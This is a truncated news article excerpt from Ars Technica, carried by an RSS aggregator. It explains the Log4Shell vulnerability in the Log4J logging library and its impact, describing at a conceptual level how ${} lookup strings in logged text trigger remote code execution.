The Log4Shell 0-day, four days on: What is it, and how bad is it really?

by
Dan Goodin
from Ars Technica - All content on (#5SZJR)
GettyImages-843466180-800x526.png

Enlarge (credit: Getty Images / Bill Hinton)

Log4Shell is the name given to a critical zero-day vulnerability that surfaced on Thursday when it was exploited in the wild in remote-code compromises against Minecraft servers. The source of the vulnerability was Log4J, a logging utility used by thousands if not millions of apps, including those used inside just about every enterprise on the planet. The Minecraft servers were the proverbial canary in the coal mine.

In the four days since, it's clear Log4Shell is every bit as grave a threat as I claimed, with the list of cloud services affected reading like a who's who of the biggest names on the Internet. Threat analysts and researchers are still assessing the damage so far and the outlook over the next weeks and months. Here's what you need to know for now.

What's Log4J and what makes Log4Shell such a big deal? Log4J is an open source Java-based logging tool available from Apache. It has the ability to perform network lookups using the Java Naming and Directory Interface to obtain services from the Lightweight Directory Access Protocol. The end result: Log4j will interpret a log message as a URL, go and fetch it, and even execute any executable payload it contains with the full privileges of the main program. Exploits are triggered inside text using the ${} syntax, allowing them to be included in browser user agents or other commonly logged attributes.

Read 6 remaining paragraphs | Comments

index?i=0JqX0OzfbaA:KS1M2i4k_ZA:V_sGLiPB index?i=0JqX0OzfbaA:KS1M2i4k_ZA:F7zBnMyn index?d=qj6IDK7rITs index?d=yIl2AUoC8zA
External Content
Source RSS or Atom Feed
Feed Location http://feeds.arstechnica.com/arstechnica/index
Feed Title Ars Technica - All content
Feed Link https://arstechnica.com/
Reply 0 comments